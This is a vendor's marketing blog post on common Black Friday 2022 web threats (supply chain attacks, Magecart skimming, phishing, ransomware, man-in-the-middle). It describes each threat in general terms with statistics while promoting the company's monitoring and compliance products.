Black Friday Web Threats 2022

During Black Friday 2021, 88 million Americans spent $8.9 billion online, with the average adult spending $430, so it’s no wonder that cybercriminals have marked this eCommerce bonanza on their calendars too. But there’s still time to prepare for the Black Friday web threats to come like web skimming & Magecart attacks, supply chain attacks, man in the middle attacks, and more.

Black Friday kicks off the holiday season shopping with millions of buyers going online to look for bargains, and the frenzy continues right up to Christmas. But it’s also a time to be on your guard as a business because cybercriminals attacked 23% of online businesses in 2020, attacks that had resulted in heavy losses to unprepared organizations. So here are the five most common Black Friday web threats to look out for –

Web Supply Chain Attack

A web supply chain attack is one where criminals insert compromised hardware and/or software into the third-party applications and open source tools that your business relies on, and the SolarWinds attack of 2020 is one of the biggest examples of this approach. Attackers planted malicious code in its servers which meant that when the 30,000 enterprise users of its Orion software installed updates, the hackers gained access to their systems. The average cost to the companies affected was $12 million.

Supply chain management experts recommend continuous and strict control and monitoring of online business supply network in order to prevent such damage from a cybercriminal, which is why a Reflectiz Smart Digital Supply Chain Inventory would have helped SolarWinds and can also help you. Our solution provides a comprehensive overview of your entire digital application ecosystem, maps the risks, and offers steps for mitigation. Join Reflectiz today and combat against one of the most common Black Friday web threat for 2022. Read more here.

Web Skimming and Magecart

The word Magecart is a combination of Magento (the popular eCommerce platform) and shopping cart. The name was originally used by one group of criminals who successfully attacked Magento shopping carts and achieved considerable notoriety between 2010 and 2020. They were so successful that the name Magecart is now used for any attack using their technique, which is called either web skimming or formjacking. This involves injecting malicious code into a website and extracting data from HTML forms. The attacker can then skim payment information from the visitor and send it to a server that they control. In July 2022 attackers did just this, injecting web skimming software into three online ordering platforms, MenuDrive, Harbortouch, and InTouchPOS, and 311 restaurant websites were subsequently compromised. The skimmers harvested the details of 50,000 payment cards and then posted them to the dark web.

Forbes has called this the number one cyber-security threat, which is one of the reasons why Reflectiz offers a unique sandbox simulator that detects these kinds of malicious changes before they can do harm. It can uncover next-generation cyber-attacks by analyzing which scripts are trying to access sensitive data, communicate with malicious domains, or log keystrokes, for example. It also tracks changes, and prioritizes alerts according to severity level, so you need never be caught out by compromised third-party scripts. Read about the latest web skimming attack here.

Phishing

Phishing exploits the weakest link in any security chain — humans. Your spam folder is probably teeming with the kind of authentic-looking emails that trick people into handing over their bank information or login details to sites like PayPal or eBay.

In the run-up to Black Friday 2021, phishing attacks more than doubled, soaring from 627,560 in September to 1,935,905 in October, so we can expect at least as many attempts during the run-up to Black Friday this year as well.

Since you can never stop email, the next best thing is to never stop training your staff, so they avoid clicking on suspicious links and responding to suspicious SMS texts or phone calls. You can then conduct regular penetration tests to see whether they are being as vigilant as they need to be.

Ransomware

Holding people or property to ransom is one of the oldest crimes, but with so many individuals and businesses now relying on digital services, digital extortion has become a quick road to riches for criminals with little chance of detection, and retail is one of the most targeted industries. 44% of retail organizations were hit by ransomware demands during 2021 and although 32% of the victims paid up, that didn’t always help them. As soon as they had paid up, they were targeted again, because criminals know that victims are often so focused on saving their business that they forget to patch the original intrusion vector.

In 2019, ransomware attacks cost the average company $200,000, and since 43% of online attacks are aimed at small businesses it’s no surprise that 60% of them go out of business within six months.

Man-in-the-Middle Attack

For this kind of cyberattack, imagine someone secretly eavesdropping on a phone call, but in this case, they might place themselves between two of your employees using a messaging app, impersonate one and trick them into sharing their password so the attacker can wreak havoc.

This kind of costly attack can also begin with human error, such as one of your employees clicking on a link in a phishing email, but to add insult to injury, every breach will also be treated as a compliance failure too. That’s why Reflectiz’s compliance management solution ensures that you never expose customer data. Compliance with privacy policies and payment card regulations is crucial to your reputation, and with Reflectiz you are always one step ahead. Our solutions help to keep you on top of your security compliance responsibilities and help you to avoid costly mistakes.